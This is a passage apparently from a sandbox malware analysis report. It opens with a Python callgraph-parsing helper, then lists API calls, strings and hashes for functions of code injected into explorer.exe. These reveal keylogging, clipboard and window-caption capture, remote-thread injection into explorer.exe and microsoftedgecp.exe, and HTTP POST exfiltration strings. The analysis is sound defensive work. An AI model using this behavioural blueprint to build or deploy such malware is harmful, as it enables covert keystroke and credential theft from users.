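    "10 Function_004729EB 30 Function_00472724 10->30 11 Function_00471FEA "
    "12 Function_00472569 13 Function_004729E8 14 Function_004725F1 "
    "15 Function_00471581 15->10 15->22 15->30 43 Function_0047293E 15->43 "
    "48 Function_004716B9 15->48 16 Function_00471000 24 Function_00471016 "
    "16->24 17 Function_0047268F 18 Function_0047240F 18->0 "
    "19 Function_0047288D 20 Function_0047200D 20->10 20->22 "
    "32 Function_004720A1 20->32 21 Function_0047298A 23 Function_00471E89 "
    "23->6 23->11 23->30 24->0 24->2 24->5 24->9 24->10 24->17 24->19 24->22 "
    "29 Function_004710A5 24->29 24->30 34 Function_004712AE 24->34 "
    "35 Function_004726AE 24->35 36 Function_004713AE 24->36 "
    "41 Function_004718BF 24->41 25 Function_00472799 26 Function_00473627 "
    "27 Function_00471B26 28 Function_00471E26 28->42 29->0 29->2 29->5 29->9 "
    "29->10 29->17 29->19 29->22 29->30 29->34 29->35 29->41 "
    "31 Function_004725A4 31->22 32->1 32->10 32->18 32->19 32->21 32->22 "
    "44 Function_004729BD 32->44 46 Function_0047243D 32->46 "
    "33 Function_004729AE 34->0 34->3 34->10 34->12 34->22 34->33 34->44 "
    "36->10 36->14 36->22 36->23 36->25 47 Function_00471F3A 36->47 "
    "37 Function_0047182D 37->10 37->20 37->22 37->31 37->33 "
    "38 Function_0047162B 38->48 39 Function_00471FB4 39->28 "
    "40 Function_00471533 41->27 41->30 45 Function_00471BBD 41->45 "
    "43->10 43->22 46->21 46->22 47->7 47->11 47->39 47->44 48->4 48->10"
)

EDGE = re.compile(r"^(\d+)->(\d+)$")


def parse_callgraph(text):
    """Return (names, edges): node id -> Function_XXXXXXXX, and caller name -> set of callee names.

    Node definitions are "<id> Function_<addr>" token pairs, edges are "<id>-><id>";
    nodes are collected first so an edge may precede its node definition."""
    tokens = text.split()
    names = {}
    for tok, nxt in zip(tokens, tokens[1:]):
        if tok.isdigit() and nxt.startswith("Function_"):
            names[int(tok)] = nxt
    edges = defaultdict(set)
    for tok in tokens:
        m = EDGE.match(tok)
        if m:
            edges[names[int(m.group(1))]].add(names[int(m.group(2))])
    return names, edges


def reachable(edges, start):
    """Every function reachable from start, start included."""
    seen, stack = set(), [start]
    while stack:
        node = stack.pop()
        if node not in seen:
            seen.add(node)
            stack.extend(edges.get(node, ()))
    return seen


def call_chains(edges, start, target):
    """All simple call paths from start to target, shortest first."""
    chains = []

    def walk(node, path):
        if node == target:
            chains.append(list(path))
            return
        for callee in sorted(edges.get(node, ())):
            if callee not in path:          # simple paths only: no revisiting
                path.append(callee)
                walk(callee, path)
                path.pop()

    walk(start, [start])
    return sorted(chains, key=lambda p: (len(p), p))


def roots(names, edges):
    """Functions no other function in the graph calls: the entry function, thread
    or callback starts, or functions reached only through indirect calls."""
    called = {c for callees in edges.values() for c in callees}
    return sorted(set(names.values()) - called)


if __name__ == "__main__":
    names, edges = parse_callgraph(CALLGRAPH)
    for chain in call_chains(edges, "Function_00471000", "Function_004718BF"):
        print(" -> ".join(chain))
    print("uncalled:", ", ".join(roots(names, edges)))
```

Both chains go through Function_00471016; the uncalled set is where to look for thread start routines (the keyboard-state loop at 0047162B and the critical-section loop at 0047182D in the graph data above are in it), since a static callgraph built from direct calls cannot see CreateThread start addresses.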

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00472724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,004729F3,-00000001,0047128C), ref: 00472731
                                                                                                                              • Part of subcall function 00472A09: GetProcessHeap.KERNEL32(00000008,0000A000,004710BF), ref: 00472A0C
                                                                                                                              • Part of subcall function 00472A09: RtlAllocateHeap.NTDLL(00000000), ref: 00472A13
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00471038
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0047106C
                                                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00471075
                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00471010), ref: 0047107B
                                                                                                                            • wsprintfA.USER32 ref: 004710E7
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00471155
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00471160
                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 0047117F
                                                                                                                            • CharLowerA.USER32(?), ref: 00471199
                                                                                                                            • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 004711B5
                                                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00471212
                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0047126C
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0047127F
                                                                                                                            • Sleep.KERNELBASE(000003E8), ref: 0047129F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                                                                            • String ID: %s%s$0-8wP,8w$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                            • API String ID: 3206029838-1920841371
                                                                                                                            • Opcode ID: 787651e8b4702a3a48997a1e6be7bf90d2092727d5f6dee79a5c9481f94e633c
                                                                                                                            • Instruction ID: 49fc6f7850c0ceac07304724a1b84891b4078f6b536d3b0d563e0ede0517dd86
                                                                                                                            • Opcode Fuzzy Hash: 787651e8b4702a3a48997a1e6be7bf90d2092727d5f6dee79a5c9481f94e633c
                                                                                                                            • Instruction Fuzzy Hash: A55136302003405BC714BF79DD449FB37A9EB44705F00863EB94D972B2EA788A8596AE

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00472A09: GetProcessHeap.KERNEL32(00000008,0000A000,004710BF), ref: 00472A0C
                                                                                                                              • Part of subcall function 00472A09: RtlAllocateHeap.NTDLL(00000000), ref: 00472A13
                                                                                                                            • wsprintfA.USER32 ref: 004710E7
                                                                                                                              • Part of subcall function 0047276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00472777
                                                                                                                              • Part of subcall function 0047276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,004710FE), ref: 00472789
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00471155
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00471160
                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 0047117F
                                                                                                                            • CharLowerA.USER32(?), ref: 00471199
                                                                                                                            • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 004711B5
                                                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00471212
                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0047126C
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0047127F
                                                                                                                            • Sleep.KERNELBASE(000003E8), ref: 0047129F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                                            • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                            • API String ID: 3018447944-2805246637
                                                                                                                            • Opcode ID: e0646f17fe3737e08e7413e7499c1963b65d8cb5172cd33f363e64b7b1bb79c5
                                                                                                                            • Instruction ID: ecf29531ae940c8a5d5b0e8f51eb46552479e305d73e02d238df061ce512e0bd
                                                                                                                            • Opcode Fuzzy Hash: e0646f17fe3737e08e7413e7499c1963b65d8cb5172cd33f363e64b7b1bb79c5
                                                                                                                            • Instruction Fuzzy Hash: FC4136302003005BC714BF758D859BF73A9EB84745F00862EB94D972E2EB789E4996AE

                                                                                                                            Control-flow Graph

                                                                                                                             control-flow graph of 00479ae0 (edge data omitted). Entry block 479ae0-479ae5; the blocks that call APIs are 479bfa-479c10 LoadLibraryA (in a loop back through 479c11-479c16), 479c23-479c30 GetProcAddress, and 479c70-479ca0 VirtualProtect (two calls); the final block 479cad branches to itself. The routine resolves imports by name and then changes page protection.
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000478000.00000040.80000000.00040000.00000000.sdmp, Offset: 00478000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_478000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86ad4dce17d5d66b59a335e9c46dcb65276b68e464c2ab6c7f5f20788b5df211
                                                                                                                            • Instruction ID: 0d014601f207436a0e699606bd555c92a3004ec98f8554e091ea031b4c86459f
                                                                                                                            • Opcode Fuzzy Hash: 86ad4dce17d5d66b59a335e9c46dcb65276b68e464c2ab6c7f5f20788b5df211
                                                                                                                            • Instruction Fuzzy Hash: 26511B71A442525EDB218A78DCC07E177A4FB52324B28473AC5EDC73C5E79C6C06C799

                                                                                                                            Control-flow Graph

                                                                                                                             control-flow graph of 0047276d: 47276d-47277f OpenFileMappingA, branching either to 472781-472791 MapViewOfFile or straight to the exit block 472794-472798.
                                                                                                                            APIs
                                                                                                                            • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00472777
                                                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,004710FE), ref: 00472789
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$MappingOpenView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3439327939-0
                                                                                                                            • Opcode ID: 67b9db2db91f856543e84ad09ff61f0cf92298acb1f5034ee2c868e1ecc6af0f
                                                                                                                            • Instruction ID: b958134215c59e1b4e2d81b147134925f30c940117af6f6d28a0adec730310e2
                                                                                                                            • Opcode Fuzzy Hash: 67b9db2db91f856543e84ad09ff61f0cf92298acb1f5034ee2c868e1ecc6af0f
                                                                                                                            • Instruction Fuzzy Hash: 87D01732701232BBE3385E7B6C0DF83AE9DDF86AE2B014025B50DD2150D6608810C6F4

                                                                                                                            Control-flow Graph

                                                                                                                             control-flow graph of 0047275a: a single block 47275a-47276c calling UnmapViewOfFile and CloseHandle.
                                                                                                                            APIs
                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000,?,0047129A,00000001), ref: 0047275E
                                                                                                                            • CloseHandle.KERNELBASE(?,?,0047129A,00000001), ref: 00472765
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFileHandleUnmapView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2381555830-0
                                                                                                                            • Opcode ID: d37c8bdbc55deb7a4a78269f6add7823d7648cf4b74196e3c67522b266a8dce0
                                                                                                                            • Instruction ID: 4dc1c12aaac84318bdaee893cbf38f77dc13cf6b9fd738b2f3cca6676a1a41e1
                                                                                                                            • Opcode Fuzzy Hash: d37c8bdbc55deb7a4a78269f6add7823d7648cf4b74196e3c67522b266a8dce0
                                                                                                                            • Instruction Fuzzy Hash: F6B0123240507197C3142F347C0C8DB3E18FE492233054164F20D8101847240A81A6ED

                                                                                                                            Control-flow Graph

                                                                                                                             control-flow graph of 00472a09: a single block 472a09-472a19 calling GetProcessHeap and RtlAllocateHeap.
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000A000,004710BF), ref: 00472A0C
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00472A13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357844191-0
                                                                                                                            • Opcode ID: cab9d31350eee82f6b681238f83a08c53bf8e23316f911460614272b69669186
                                                                                                                            • Instruction ID: 44ef23222b921e47cc262f2f483aa895c0270fcf7edb01de5d9b64096126d031
                                                                                                                            • Opcode Fuzzy Hash: cab9d31350eee82f6b681238f83a08c53bf8e23316f911460614272b69669186
                                                                                                                            • Instruction Fuzzy Hash: 37A002B16501906BDD446FB49D0DF157658A744703F004554724EC50549D7555849725

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00472724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,004729F3,-00000001,0047128C), ref: 00472731
                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 004718F4
                                                                                                                            • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 0047192F
                                                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 004719BF
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,00473638,00000016), ref: 004719E6
                                                                                                                            • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00471A0E
                                                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00471A1E
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00471A38
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 00471A40
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00471A4E
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00471A55
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00471A6B
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00471A72
                                                                                                                            • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00471A88
                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00471AB2
                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00471AC5
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00471ACC
                                                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00471AD3
                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00471AE7
                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00471AFE
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00471B0B
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00471B11
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00471B17
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00471B1A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                            • String ID: 0-8wP,8w$atan$ntdll$opera_shared_counter
                                                                                                                            • API String ID: 1066286714-1929110738
                                                                                                                            • Opcode ID: 84396b93fbdefac977f6376ef4eb73f06408679e0de11dfbe46f7ed8e0b5554e
                                                                                                                            • Instruction ID: 100814e3a55634df8c2fe6b265347e26d39409d0609641261291420f1f3094c9
                                                                                                                            • Opcode Fuzzy Hash: 84396b93fbdefac977f6376ef4eb73f06408679e0de11dfbe46f7ed8e0b5554e
                                                                                                                            • Instruction Fuzzy Hash: D861AF71204345AFD310DF258C84EAB7BECEB48755F00452AF94DD3261D674EE44DBAA

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 004727B5
                                                                                                                            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 004727CD
                                                                                                                            • lstrlen.KERNEL32(?,00000000), ref: 004727D5
                                                                                                                            • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 004727E0
                                                                                                                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 004727FA
                                                                                                                            • wsprintfA.USER32 ref: 00472811
                                                                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 0047282A
                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00472834
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                            • String ID: %02X
                                                                                                                            • API String ID: 3341110664-436463671
                                                                                                                            • Opcode ID: 794685f1bafa42d71dd679b91b09e9faab9044f37ba05a5f434ac126f96e30d7
                                                                                                                            • Instruction ID: b5839d302c9b2f54d9c589ee91886ac8e52ad4fbc0b8754ee227f4eb79c111e7
                                                                                                                            • Opcode Fuzzy Hash: 794685f1bafa42d71dd679b91b09e9faab9044f37ba05a5f434ac126f96e30d7
                                                                                                                            • Instruction Fuzzy Hash: 5F115B71900148BFDB119F95EC88EEEBFBCEB48306F104476F608E2150D6754F81AB68
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?), ref: 00471652
                                                                                                                            • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0047167A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: KeyboardStateUnicode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3453085656-3916222277
                                                                                                                            • Opcode ID: 725a35a2e42070b76e1e489305640ef8ab121efbd349cf4fc9f3f91cdcb0e87f
                                                                                                                            • Instruction ID: e893def3d7d8de89e43d7e83e4f7fc9d41406ff3431e090362ad313fb465fd08
                                                                                                                            • Opcode Fuzzy Hash: 725a35a2e42070b76e1e489305640ef8ab121efbd349cf4fc9f3f91cdcb0e87f
                                                                                                                            • Instruction Fuzzy Hash: E901C8319002055BDB30CB18DD45BFB737CEF05701F08842BE909D2261D738DA918AA9

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RtlZeroMemory.NTDLL(00475013,0000001C), ref: 004713C8
                                                                                                                            • VirtualQuery.KERNEL32(004713AE,?,0000001C), ref: 004713DA
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0047140B
                                                                                                                            • GetCurrentProcessId.KERNEL32(00000004), ref: 0047141C
                                                                                                                            • wsprintfA.USER32 ref: 00471433
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00471448
                                                                                                                            • GetLastError.KERNEL32 ref: 0047144E
                                                                                                                            • RtlInitializeCriticalSection.NTDLL(0047582C), ref: 00471465
                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00471489
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 004714A6
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004714AF
                                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 004714D0
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004714D3
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004714F1
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 0047150D
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00471514
                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 0047152A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                                                                            • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                                                                            • API String ID: 3628807430-1779906909
                                                                                                                            • Opcode ID: b8f1996d041ba2748a336bb9570e0b4d0379becd03f1f173060b8be350425bea
                                                                                                                            • Instruction ID: 843a5003397a4c1ad9b6d125fc64b83791091ddd56eb53c7a75f55536f84bcb4
                                                                                                                            • Opcode Fuzzy Hash: b8f1996d041ba2748a336bb9570e0b4d0379becd03f1f173060b8be350425bea
                                                                                                                            • Instruction Fuzzy Hash: 8041A570600344BBD710BF76EC09E9B3BADFB44756B00C42AF50D86261DBB99A449BAD

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.NTDLL(0047582C), ref: 004716C4
                                                                                                                            • lstrlenW.KERNEL32 ref: 004716DB
                                                                                                                            • lstrlenW.KERNEL32 ref: 004716F3
                                                                                                                            • wsprintfW.USER32 ref: 00471743
                                                                                                                            • GetForegroundWindow.USER32 ref: 0047174E
                                                                                                                            • GetWindowTextW.USER32(00000000,00475850,00000800), ref: 00471767
                                                                                                                            • GetClassNameW.USER32(00000000,00475850,00000800), ref: 00471774
                                                                                                                            • lstrcmpW.KERNEL32(00475020,00475850), ref: 00471781
                                                                                                                            • lstrcpyW.KERNEL32(00475020,00475850), ref: 0047178D
                                                                                                                            • wsprintfW.USER32 ref: 004717AD
                                                                                                                            • lstrcatW.KERNEL32 ref: 004717C6
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(0047582C), ref: 004717D3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                                                                            • String ID: Clipboard -> $ New Window Caption -> $ PG$%s%s%s$%s%s%s%s$PXG
                                                                                                                            • API String ID: 2651329914-455055589
                                                                                                                            • Opcode ID: 5251a9e92d078e8fde6c6a37dd35730e98917cfc70922d05fb1522b9f0688707
                                                                                                                            • Instruction ID: c0b18b29a69df591af17873c648a4bc9ce574ac7feffb8b4f6476458f6a5f9e6
                                                                                                                            • Opcode Fuzzy Hash: 5251a9e92d078e8fde6c6a37dd35730e98917cfc70922d05fb1522b9f0688707
                                                                                                                            • Instruction Fuzzy Hash: 4C21D630600654BBC3243F3AFD88EAF3B9CEB41B56715C036F40D96271DA598D41A6EE

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00472603
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0047260B
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0047261B
                                                                                                                            • Thread32First.KERNEL32(00000000,0000001C), ref: 00472629
                                                                                                                            • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00472648
                                                                                                                            • SuspendThread.KERNEL32(00000000), ref: 00472658
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00472667
                                                                                                                            • Thread32Next.KERNEL32(00000000,0000001C), ref: 00472677
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00472682
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1467098526-0
                                                                                                                            • Opcode ID: 31d0dcf48aae500bc5f1b4e0392986352e438a3027e03b61e7f704bcc565c39f
                                                                                                                            • Instruction ID: 9c00f44c72c6916a2f774b56fd9dbd4a62bcf438a1e6c0506c950b8d0fbd7ff2
                                                                                                                            • Opcode Fuzzy Hash: 31d0dcf48aae500bc5f1b4e0392986352e438a3027e03b61e7f704bcc565c39f
                                                                                                                            • Instruction Fuzzy Hash: 33117371405250EFD7119F60AD4CAAFBBA8FF44706F00442AF64992254D7748A89ABAB

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00472A09: GetProcessHeap.KERNEL32(00000008,0000A000,004710BF), ref: 00472A0C
                                                                                                                              • Part of subcall function 00472A09: RtlAllocateHeap.NTDLL(00000000), ref: 00472A13
                                                                                                                              • Part of subcall function 0047298A: lstrlen.KERNEL32(00474FE2,?,00000000,00000000,004720DD,76228A60,00474FE2,00000000), ref: 00472992
                                                                                                                              • Part of subcall function 0047298A: MultiByteToWideChar.KERNEL32(00000000,00000000,00474FE2,00000001,00000000,00000000), ref: 004729A4
                                                                                                                              • Part of subcall function 004724CC: RtlZeroMemory.NTDLL(?,00000018), ref: 004724DE
                                                                                                                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 00472139
                                                                                                                            • wsprintfW.USER32 ref: 00472272
                                                                                                                            • wsprintfW.USER32 ref: 004722DD
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 004723A7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                            • API String ID: 4204651544-1701262698
                                                                                                                            • Opcode ID: 7dd516415a3292ab8bed37698d4c9775f23f1f550a6f8460499f7751a5bad413
                                                                                                                            • Instruction ID: 53a0ff9e7bbd1b39d2a172e529b580b6441f2a6f57ccce6b2bdb96a44aef6636
                                                                                                                            • Opcode Fuzzy Hash: 7dd516415a3292ab8bed37698d4c9775f23f1f550a6f8460499f7751a5bad413
                                                                                                                            • Instruction Fuzzy Hash: 6EA19F71608340AFD3109F65D984A6BBBE8FF88344F14492EF989D3351DAB8DE448B5A

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RtlZeroMemory.NTDLL(?,00000018), ref: 004724DE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
